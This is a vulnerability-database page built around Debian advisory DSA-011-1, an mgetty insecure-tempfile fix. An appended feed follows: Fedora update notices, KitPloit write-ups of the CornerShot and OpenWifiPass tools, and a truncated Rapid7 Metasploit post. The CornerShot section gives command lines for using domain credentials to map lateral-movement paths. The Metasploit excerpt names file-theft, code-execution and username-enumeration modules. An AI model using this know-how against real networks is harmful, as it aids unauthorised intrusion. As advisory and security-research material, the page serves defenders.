[SECURITY] [DSA-011-1] New version of mgetty released
2001-01-10T00:00:00
ID DEBIAN:DSA-011-1:E329E Type debian Reporter Debian Modified 2001-01-10T00:00:00
Description
Debian Security Advisory DSA-011-1 security@debian.org
http://www.debian.org/security/ Michael Stone
January 10, 2001
Package: mgetty
Vulnerability: insecure tempfile
Debian-specific: no
Immunix reports that mgetty does not create temporary files in a secure
manner, which could lead to a symlink attack. This has been corrected
in mgetty 1.1.21-3potato1
We recommend you upgrade your mgetty package immediately.
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 2.2 alias potato
Potato was released for the alpha, arm, i386, m68k, powerpc and sparc
architectures.
These files will be moved into
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
For not yet released architectures please refer to the appropriate
directory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-011-1:E329E", "bulletinFamily": "unix", "title": "[SECURITY] [DSA-011-1] New version of mgetty released", "description": "- ----------------------------------------------------------------------------\nDebian Security Advisory DSA-011-1 security@debian.org\nhttp://www.debian.org/security/ Michael Stone\nJanuary 10, 2001\n- ----------------------------------------------------------------------------\n\nPackage: mgetty\nVulnerability: insecure tempfile\nDebian-specific: no\n\nImmunix reports that mgetty does not create temporary files in a secure\nmanner, which could lead to a symlink attack. This has been corrected \nin mgetty 1.1.21-3potato1\n\nWe recommend you upgrade your mgetty package immediately.\n\nwget url\n\twill fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ------------------------------------\n\n Potato was released for the alpha, arm, i386, m68k, powerpc and sparc\n architectures.\n\n Source archives:\n http://security.debian.org/debian-security/dists/stable/updates/main/source/mgetty_1.1.21-3potato1.diff.gz\n MD5 checksum: 7fa9561fad8dbe7a4a288c8135b33174\n http://security.debian.org/debian-security/dists/stable/updates/main/source/mgetty_1.1.21-3potato1.dsc\n MD5 checksum: 0d4b5d68d1bb236970e1fe5f6ae02264\n http://security.debian.org/debian-security/dists/stable/updates/main/source/mgetty_1.1.21.orig.tar.gz\n MD5 checksum: 41b23fb60b123a25179067bb0711b935\n\n Architecture-independent files:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-all/mgetty-docs_1.1.21-3potato1_all.deb\n MD5 checksum: c406e21ea10a22497b4f8d6a0473b537\n\n Alpha architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty-fax_1.1.21-3potato1_alpha.deb\n MD5 checksum: 835087610bd00ccd5a40e01936e61bb2\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty-viewfax_1.1.21-3potato1_alpha.deb\n MD5 checksum: e2958b3b698687bfc9de34742c1b90b6\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty-voice_1.1.21-3potato1_alpha.deb\n MD5 checksum: 1c0981919bca639e309799d9e532b2d6\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty_1.1.21-3potato1_alpha.deb\n MD5 checksum: d838cb1009a5925ced1c92411b013ffc\n\n ARM architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty-fax_1.1.21-3potato1_arm.deb\n MD5 checksum: 1cf2e00618425cec1dd76dde1515f6c9\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty-viewfax_1.1.21-3potato1_arm.deb\n MD5 checksum: dfd5bb2c08ec7fc06518f8df29c0df97\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty-voice_1.1.21-3potato1_arm.deb\n MD5 checksum: c8b9477a35b82f439b37bff1147aad93\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty_1.1.21-3potato1_arm.deb\n MD5 checksum: 9a06b9274f595c849e7ffc40ec902e33\n\n Intel ia32 architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty-fax_1.1.21-3potato1_i386.deb\n MD5 checksum: fc841c1e78fa0d3347115cf8a50d63cf\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty-viewfax_1.1.21-3potato1_i386.deb\n MD5 checksum: 57992604cc9437ce1b3362f8e05403ab\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty-voice_1.1.21-3potato1_i386.deb\n MD5 checksum: 14f6f890c3595c020508b936204fa177\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty_1.1.21-3potato1_i386.deb\n MD5 checksum: 52c203e583636f32389244c851823afa\n\n Motorola 680x0 architecture:\n not yet available\n\n PowerPC architecture:\n not yet available\n\n Sun Sparc architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty-fax_1.1.21-3potato1_sparc.deb\n MD5 checksum: 5fcec09109acc945db8612710ab87e9d\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty-viewfax_1.1.21-3potato1_sparc.deb\n MD5 checksum: 4e2a6603b8d11c495d519dec3ad2946d\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty-voice_1.1.21-3potato1_sparc.deb\n MD5 checksum: f4203cbdba33a85f05b63e5883887af4\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty_1.1.21-3potato1_sparc.deb\n MD5 checksum: 02bd00238010590cb9a4e73d8122f2f7\n\n These files will be moved into\n ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.\n\nFor not yet released architectures please refer to the appropriate\ndirectory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .\n\n- ----------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "published": "2001-01-10T00:00:00", "modified": "2001-01-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2001/msg00000.html", "reporter": "Debian", "references": [], "cvelist": [], "type": "debian", "lastseen": "2018-10-16T22:14:45", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-10-16T22:14:45", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:1485"]}, {"type": "mssecure", "idList": ["MSSECURE:82D3580754DA96FD93831A7833D47D62"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:90DD0AABBC88137103AF5EBE0BC139D7"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-70929"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:04DFB64876C2018B4C8089BDBC359066"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0541-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:2480263761626163644"]}, {"type": "schneier", "idList": ["SCHNEIER:7771A7F05A95A96025A02D48BA85B7D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BCA35B2D5B3E7432E316ECDF7499D8CD", "TALOSBLOG:B6094C89CA7BC27EB70317743B95A344"]}, {"type": "cve", "idList": ["CVE-2020-11930", "CVE-2020-11928"]}, {"type": "ubuntu", "idList": ["USN-4331-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:48348", "EDB-ID:48346"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143735", "OPENVAS:1361412562311220201511", "OPENVAS:1361412562311220201509", "OPENVAS:1361412562310143731"]}], "modified": "2018-10-16T22:14:45", "rev": 2}, "vulnersScore": 4.3}, "affectedPackage": []}
{"fedora": [{"lastseen": "2021-02-27T00:37:17", "bulletinFamily": "unix", "cvelist": [], "description": "Rygel is a home media solution that allows you to easily share audio, video and pictures, and control of media player on your home network. In technical te rms it is both a UPnP AV MediaServer and MediaRenderer implemented through a pl ug-in mechanism. Interoperability with other devices in the market is achieved by conformance to very strict requirements of DLNA and on the fly conversion of media to format that client devices are capable of handling. ", "modified": "2021-02-26T23:55:41", "published": "2021-02-26T23:55:41", "id": "FEDORA:E4F3830B1D04", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rygel-0.40.1-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": [], "description": "The libpq package provides the essential shared library for any PostgreSQL client program or interface. You will need to install this package to use any other PostgreSQL package or any clients that need to connect to a PostgreSQL server. ", "modified": "2021-02-26T01:10:06", "published": "2021-02-26T01:10:06", "id": "FEDORA:A99C730CC0D3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: libpq-12.6-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14349", "CVE-2020-14350", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced Object-Relational database management system (DBM S). The base postgresql package contains the client programs that you'll need to access a PostgreSQL DBMS server, as well as HTML documentation for the whole system. These client programs can be located on the same machine as the PostgreSQL server, or on a remote machine that accesses a PostgreSQL server over a network connection. The PostgreSQL server can be found in the postgresql-server sub-package. ", "modified": "2021-02-26T01:10:06", "published": "2021-02-26T01:10:06", "id": "FEDORA:E148330CC0ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: postgresql-12.6-1.fc33", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "This package contains common configuration files and documentation for cont ainer tools ecosystem, such as Podman, Buildah and Skopeo. It is required because the most of configuration files and docs come from p rojects which are vendored into Podman, Buildah, Skopeo, etc. but they are not pack aged separately. ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:4044C30CB118", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: containers-common-1-4.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "podman (Pod Manager) is a fully featured container engine that is a simple daemonless tool. podman provides a Docker-CLI comparable command line that eases the transition from other container engines and allows the management of pods, containers and images. Simply put: alias docker=3Dpodman. Most podman commands can be run as a regular user, without requiring additional privileges. podman uses Buildah(1) internally to create container images. Both tools share image (not container) storage, hence each can use or manipulate images (but not containers) created by the other. Manage Pods, Containers and Container Images podman Simple management tool for pods, containers and images ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:578F330CA03E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: podman-3.0.1-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "Command line utility to inspect images and repositories directly on Docker registries without the need to pull them ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:6F355304C5CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: skopeo-1.2.2-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27135"], "description": "The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. ", "modified": "2021-02-26T01:09:41", "published": "2021-02-26T01:09:41", "id": "FEDORA:727393060988", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: xterm-366-1.fc33", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": [], "description": "The libpq package provides the essential shared library for any PostgreSQL client program or interface. You will need to install this package to use any other PostgreSQL package or any clients that need to connect to a PostgreSQL server. ", "modified": "2021-02-26T01:09:39", "published": "2021-02-26T01:09:39", "id": "FEDORA:7C2433052DBB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: libpq-12.6-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": [], "description": "PostgreSQL is an advanced Object-Relational database management system (DBM S). The base postgresql package contains the client programs that you'll need to access a PostgreSQL DBMS server, as well as HTML documentation for the whole system. These client programs can be located on the same machine as the PostgreSQL server, or on a remote machine that accesses a PostgreSQL server over a network connection. The PostgreSQL server can be found in the postgresql-server sub-package. ", "modified": "2021-02-26T01:09:39", "published": "2021-02-26T01:09:39", "id": "FEDORA:A78113052BB8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: postgresql-12.6-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23336", "CVE-2021-3177"], "description": "Python 3.7 package for developers. This package exists to allow developers to test their code against an older version of Python. This is not a full Python stack and if you wish to run your applications with Python 3.7, see other distributions that support it, such as an older Fedora release. ", "modified": "2021-02-26T01:09:33", "published": "2021-02-26T01:09:33", "id": "FEDORA:764EE30C99A3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: python37-3.7.10-1.fc32", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2021-02-27T03:29:49", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-8sb2d52Q60Y/YDSVjvlYggI/AAAAAAAAVcI/utnseqOhDSY4I40-ovKhZsm9xhJyGpqjACNcBGAsYHQ/s1591/cornershot_1_csdemo.gif>)\n\n \n\n\nIn warfare, CornerShot is a weapon that allows a soldier to look past a corner (and possibly take a shot), without risking exposure. Similarly, the CornerShot package allows one to look at a remote host\u2019s network access without the need to have any special privileges on that host. \n\nUsing CornerShot, a ** source ** , with network access to ** carrier ** , can determine whether there is network access between the ** carrier ** and ** target ** for a specific port ** p ** . \n\n \n\n\nFor example, let's assume an red team is trying to propagate from a \"compromised\" source host A, to a target host X, for which host A has no access to. If they propagate through host B, only then they will discover that there is not network access between host B and X. \n\nBy using CornerShot, the team can discover that host C actually has access to target X, so propagation towards target X should go through host C first. \n \n \n +-----+ +-----+ +-----+ \n | | | | filtered | | \n | A +--------> B +----X--->(p) X | \n | | | | | | \n +-----+ +-----+ +-(p)-+ \n source carrier target \n + ^ \n | | \n | +-----+ | \n | | | open | \n +---------->+ C +-------------+ \n | | \n +-----+ \n \n \n \n\nSimilarly to [ nmap ](<https://nmap.org/> \"nmap\" ) , CornerShot differentiates between the following state of ports: _ open _ , _ closed _ , _ filtered _ and _ unknown _ (if it can't be determined). \n\nThe following demo shows running CornerShot against two carriers hosts 172.0.1.12 & 172.0.1.13, in order to determine if the have network access to 192.168.200.1: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-3J0lPVG9-cc/YDSVtxT_s3I/AAAAAAAAVcM/wXtXwK7InNcg0mThcm_9PWpulg86COtzQCNcBGAsYHQ/s1591/cornershot_1_csdemo.gif>)\n\nRead more [ here ](<https://zeronetworks.com/blog/adversary-resilience-via-least-privilege-networking-part-1/> \"here\" ) . \n\n \n** Use Cases ** \n \n** Single Deployment for Complete Network Visibility ** \n\n\nThe seemingly simple task of identifying if some host B in the network has access to host C may require large deployment of network sensors, device agents or collection of a multitude of firewall rules, router configurations and host policies. \n\nCornerShot can simplify this process by using one (or very few) agents that can query other hosts in the network, to determine their access to remote hosts. \n\n \n** Validate [ BloodHound ](<https://www.kitploit.com/search/label/BloodHound> \"BloodHound\" ) Paths ** \n\n\nSecurity teams that utilize BloodHound to find, and mitigate, [ privilege escalation ](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) paths inside their network, often struggle with millions of logical paths discovered by BloodHound. \n\n[ ShotHound ](<https://github.com/zeronetworks/BloodHound-Tools/tree/main/ShotHound> \"ShotHound\" ) is a tool that integrated CornerShot with BloodHound, in order to discover practical paths that are supported by network access. \n\n \n** Getting Started ** \n\n\nCornerShot can be used as a package, or as a standalone module. The only [ requirements ](<https://www.kitploit.com/search/label/Requirements> \"requirements\" ) are Python 3 and the impacket package. \n\n \n** Installation ** \n\n \n \n pip install cornershot\n\n \n** Standalone Usage ** \n\n\nBasic usage requires [ credentials ](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) from a valid domain user, a FQDN domain, a carrier IP and target IP. \n \n \n python -m cornershot <user> <password> <domain> <carrier> <target>\n\nTo scan a range of carriers against a range of targets, subnets or IP ranges may be used in a comma delimited list: \n \n \n python -m cornershot <user> <password> <domain> 192.168.1.10-192.168.1.20 192.168.5.0/24,192.168.6.0/24\n\nBy default, CornerShot will try to scan the following ports: 135, 445, 3389, 5985, 5986. The user can provide a comma delimited list of ports and port ranges: \n \n \n python -m cornershot -tp 22,8080,45000-45005 <user> <password> <domain> <carrier> <target>\n\n \n** As a Package ** \n\n\nWithin code, one needs to instantiate a CornerShot object with the username, password and domain name of a valid domain user. Adding carriers, target and ports is achieved via the _ add_shots _ method. Once ready, the _ open_fire _ method can be called, which performs only the relevant RPC calls based on the required ports. \n \n \n from cornershot import CornerShot \n cs = CornerShot(\"username\", \"password\", \"fqdn\") \n cs.add_shots(carriers=[\"192.168.1.1\"],targets=[\"192.168.1.2\",\"192.168.1.3\"]) \n results = cs.open_fire()\n\nThe result of _ open_fire _ is a dictionary with keys of carriers, each carrier has another set of keys for targets, and finally, each target holds a dictionary of ports and their respective states. This is an example format of a result: \n \n \n {'carrier_1': \n \t{'target_1': \n \t\t{135: 'unknown', 445: 'filtered', 3389: 'filtered', 5986: 'filtered', 5985: 'filtered'}, \n \t'target_2': \n \t\t{135: 'unknown', 445: 'open', 5985: 'unknown', 5986: 'filtered', 3389: 'open'} \n \t}, \n 'carrier_2': \n \t{'target_1': \n \t\t{3389: 'filtered', 135: 'filtered', 5985: 'filtered', 445: 'filtered', 5986: 'unknown'}, \n \t'target_2': \n \t\t{5985: 'filtered', 5986: 'filtered', 445: 'filtered', 135: 'filtered', 3389: 'open'} \n \t} \n }\n\n \n** How CornerShot Works? ** \n\n\nCornerShot relies on various, well documented, standard Remote Procedure Call (RPC) methods that are used by various Microsoft services. By using methods that only require an authenticated account in the domain, CornerShot is able to trigger network traffic from a carrier host to a target. \n\nCornerShot is able to determine the remote's port state by measuring the time an RPC call took, and using different error codes for each RPC method. \n\n \n** RPC Methods ** \n\n\nThe reader may be familiar with the [ \"printer bug\" ](<https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/41> \"printer bug\" ) , which was discovered by [ Lee Christensen ](<https://twitter.com/tifkin_> \"Lee Christensen\" ) . While it is called a bug, it is a well documented behaviour of the printing service, which allows any authenticated user to coerce a remote server to authenticate to any machine, using the [ RpcRemoteFindFirstPrinterChangeNotificationEx ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d> \"RpcRemoteFindFirstPrinterChangeNotificationEx\" ) method. \n\nCornerShot utilizes the following RPC methods from several Microsoft protocols (there are many additional methods, which will be implemented in future versions): \n\n * RPRN : [ RpcOpenPrinter ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/989357e2-446e-4872-bb38-1dce21e1313f> \"RpcOpenPrinter\" )\n * RRP : [ BaseRegSaveKey ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/f022247d-6ef1-4f46-b195-7f60654f4a0d> \"BaseRegSaveKey\" )\n * EVEN : [ ElfrOpenBELW ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1> \"ElfrOpenBELW\" )\n * EVEN6 : [ EvtRpcOpenLogHandle ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even6/30a294b1-4e95-468a-a90a-185a5ea63ea0> \"EvtRpcOpenLogHandle\" )\n\nImplementation of the protocols themselves is achieved via the wonderful [ impacket ](<https://github.com/SecureAuthCorp/impacket> \"impacket\" ) package. \n\n \n** RpcOpenPrinter ** \n\n\nThis method receives a [ printerName ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/24fcd124-035c-4988-a858-3a7d8d6f7b43> \"printerName\" ) as parameter. The printerName name can be a path to a local file, a remote file or even to a web printer. By supplying a name that conforms with the WEB_PRINT_SERVER format, it is possible to query any remote port. One example of a web print server name which will trigger HTTP traffic to a remote host and port is: \"http://<target_ip>:<target_port>/printers/ppp/.printer\". \n\n \n** BaseRegSaveKey ** \n\n\nTo utilize this method, we need a two step approach: first, open a [ registry key ](<https://www.kitploit.com/search/label/Registry%20Key> \"registry key\" ) on the remote host - which results with a valid handle, and second, try and save a backup of this handle to a remote file. The BaseRegSaveKey method receives a file path to which it can save a backup of a registry, which triggers SMB traffic over port 445 (and 135 as backup) to a target. The registry key CornerShot opens is the HKEY_CURRENT_USER, which is open for reading by default on most client hosts. \n\n \n** ElfrOpenBELW ** \n\n\nThis function tries to backup Windows events into a file path, which can be remote - in such a case the service will try and access the remote host and path. \n\n \n** EvtRpcOpenLogHandle ** \n\n\nSimilarly to the EVEN method, only this method utilizes a different version of the Windows Events protocol, which is done directly over TCP - no need for SMB port to be open. \n\n \n** Determining Port State ** \n\n\nCornerShot estimates the remote ports' state based on timing factors and error messages received by the RPC method or underlying transport. By experimenting with different Windows hosts and various RPC protocols, we came up with 3 different timing thresholds that prove to work in most network environments. These thresholds are best illustrated with the following figure: \n \n \n + + + \n | | | \n unknown | open / closed | filtered | open \n / | | | \n open | | | \n | | | \n +-------------+------------------+-----------------+--------------+ \n 0 0.5 20 40 Seconds \n MIN FILTERED UPPER \n \n\nThe MIN threshold is 0.5 seconds, responses below this threshold either mean an error in the underlying RPC method or underlying transport, or a response could have been received from the target host. \n\nReplies below FILTERED threshold of 20 seconds could indicate either an open or a closed port, depending on the type of error message received for the method. \n\nReplies between the FILTERED and UPPER threshold of 40 seconds indicate a filtered port for all tested methods (so far...). And requests taking more than the UPPER limit indicate a prolonged open TCP connection. \n\n \n** OS support ** \n\n\nExecuting Corenershot against different OS versions and configurations will yield different results. Not all Windows versions have the same named pipes or behave the same when queried with the same RPC method. Most Windows OOTB will not expose SMB and other RPC services over the network, however, experience has shown that in large environments these ports tend to be open and accessible for most of the assets. \n\nThe following table shows default support for various RPC protocols, given that the appropriate ports are accessible to the carrier host and no configuration changes were made to the host: \n\nOS | Supported RPC Protocols | Required Open Carrier Ports | Possible Target Ports to Scan \n---|---|---|--- \nWindows 7 | EVEN,EVEN6 | 445 / 135 & even6 tcp port | 445* \nWindows 8 | EVEN,EVEN6 | 445 / 135 & even6 tcp port | 445* \nWindows 10 | EVEN,EVEN6,RPRN | 445 / 135 & even6 tcp port | ** ANY ** \nServer 2008 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \nServer 2012 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \nServer 2016 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \nServer 2019 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \n \n* If Webclient service is running on a client machine, additional ports can be scanned. Currently CornerShot does not support this option. \n\n** RPRN protocol is supported on server hosts, however opening a remote web printer does not work (which is why we can't scan ANY target port) - until we find a workaround \n\n\uf609 \n\n \n** Developers ** \n\n\nAdditional RPC shots, or any other contribution is welcome! \n\nAll RPC methods are implemented under _ /shots _ , and inherit from an abstract class named _ BaseRPCShot _ . The _ /example _ folder shows how to create a custom RPC shot and use it in code. \n\n \n** Contact Us ** \n\n\nWe are happy to hear from you! For bugs, patches, suggestions on this package, please contact us at [email protected] \n\n \n \n\n\n** [ Download Cornershot ](<https://github.com/zeronetworks/cornershot> \"Download Cornershot\" ) **\n", "edition": 1, "modified": "2021-02-26T20:30:10", "published": "2021-02-26T20:30:10", "id": "KITPLOIT:296453770118336339", "href": "http://www.kitploit.com/2021/02/cornershot-amplify-network-visibility.html", "title": "CornerShot - Amplify Network Visibility From Multiple POV Of Other Hosts", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T19:39:33", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-hl1ui4DNJnI/YDSUvQ6K-8I/AAAAAAAAVcA/1CJUslQwoAQQGiG45ItDg229cvNM7nXOgCNcBGAsYHQ/s787/wifi.png>)\n\n \n\n\nAn open source implementation of the grantor role in Apple's Wi-Fi Password Sharing protocol. \n\n \n** Disclaimer ** \n\n\nOpenWifiPass is experimental software and is the result of reverse engineering efforts by the [ Open Wireless Link ](<https://owlink.org> \"Open Wireless Link\" ) project. The code serves solely documentary and educational purposes. It is _ untested _ and _ incomplete _ . For example, the code ** does not verify the identity of the requestor ** . So, do not use this implementation with sensitive Wi-Fi credentials. OpenWifiPass is not affiliated with or endorsed by Apple Inc. \n\n \n\n\n** Requirements ** \n\n\n** Hardware: ** [ Bluetooth Low Energy ](<https://www.kitploit.com/search/label/Bluetooth%20Low%20Energy> \"Bluetooth Low Energy\" ) radio, e.g., [ Raspberry Pi ](<https://www.kitploit.com/search/label/Raspberry%20Pi> \"Raspberry Pi\" ) 4 \n\n** OS: ** Linux (due to the ` bluepy ` dependency) \n\n \n** Install ** \n\n\nClone this repository and install it: \n \n \n git clone [email\u00a0protected]/seemoo-lab/openwifipass.git \n pip3 install ./openwifipass\n\n \n** Run ** \n\n\nRun ` openwifipass ` to share Wi-Fi credentials ( ` SSID ` and ` PSK ` ) with _ any _ requestor (we need super user privileges to use the Bluetooth subsystem): \n \n \n sudo -E python3 -m openwifipass --ssid <SSID> --psk <PSK>\n\n** Use [ quoting ](<https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.html#Quoting> \"quoting\" ) of your shell to remove special meaning of certain characters in ` SSID ` / ` PSK ` . ** In the example below, we use single quotes ( ` ' ` ) to prevent shell expansion of the ` $ ` character in the PSK. \n\nA successful run of the protocol would look as follows: \n \n \n [email\u00a0protected]:~/openwifipass $ sudo -E python3 -m openwifipass --ssid OWL --psk '$uper$ecretPassword' \n Start scanning... \n SSID match in PWS advertisement from aa:bb:cc:dd:ee:ff \n Connect to device aa:bb:cc:dd:ee:ff \n Send PWS1 \n Receive PWS2 \n Send M1 \n Receive M2 \n Send M3 \n Receive M4 \n Send PWS3 \n Receive PWS4 \n Wi-Fi Password Sharing completed \n \n\n \n** OPACK ** \n\n\nThis projects contains a reusable OPACK (de)serializer. Read [ OPACK.md ](<https://github.com/seemoo-lab/openwifipass/blob/main/OPACK.md> \"OPACK.md\" ) for more information. \n\n \n** Authors ** \n\n\n * Jannik Lorenz \n \n** Publications ** \n\n\n * Milan Stute, Alexander Heinrich, Jannik Lorenz, and Matthias Hollick. ** Disrupting Continuity of Apple\u2019s Wireless Ecosystem Security: New Tracking, DoS, and MitM Attacks on iOS and macOS Through Bluetooth Low Energy, AWDL, and Wi-Fi. ** _ 30th USENIX Security Symposium (USENIX Security \u201921) _ , August 11\u201313, 2021, Vancouver, B.C., Canada. _ To appear _ . \n * Jannik Lorenz. ** Wi-Fi Sharing for All: [ Reverse Engineering ](<https://www.kitploit.com/search/label/Reverse%20Engineering> \"Reverse Engineering\" ) and Breaking the Apple Wi-Fi Password Sharing Protocol. ** Bachelor thesis, _ Technical University of Darmstadt _ , March 2020. \n \n \n\n\n** [ Download Openwifipass ](<https://github.com/seemoo-lab/openwifipass> \"Download Openwifipass\" ) **\n", "edition": 1, "modified": "2021-02-26T11:30:06", "published": "2021-02-26T11:30:06", "id": "KITPLOIT:1929489446814904344", "href": "http://www.kitploit.com/2021/02/openwifipass-open-source-implementation.html", "title": "OpenWifiPass - An Open Source Implementation Of Apple's Wi-Fi Password Sharing Protocol In Python", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-02-26T20:49:49", "bulletinFamily": "info", "cvelist": ["CVE-2020-17519", "CVE-2021-3156"], "description": "## Hey who finked about Flink?\n\n\n\nIn this week's round of modules, contributor [bcoles](<https://github.com/bcoles>) offered up two modules to leverage that [Apache Flink](<https://flink.apache.org/>) install you found in some fun new ways. If you are just looking to filch a few files, `auxiliary/scanner/http/apache_flink_jobmanager_traversal` leverages [CVE-2020-17519](<https://attackerkb.com/topics/t2rkmB0Uem/cve-2020-17519?referrer=blog>) to pilfer the filesystem on Flink versions 1.11.0 thru 1.11.2. The second module, for a litte extra fun, `exploit/multi/http/apache_flink_jar_upload_exec` utilizes the job functionality in Flink to run arbitrary java code as the web server user, turns out there is a `meterpreter` for that!\n\n## RDP: a dream and a nightmare for the sysAdmin near you.\n\nEver wonder if exposing a remote desktop in a web page was a good idea? I mean, it's just a web server, the internet loves those. Turns out timing attacks can expose your usernames when someone chooses to pay close attention. A recently contributed module `auxiliary/scanner/http/rdp_web_login` contributed by [Matthew Dunn](<https://github.com/k0pak4>) can even pay attention for you. Using the 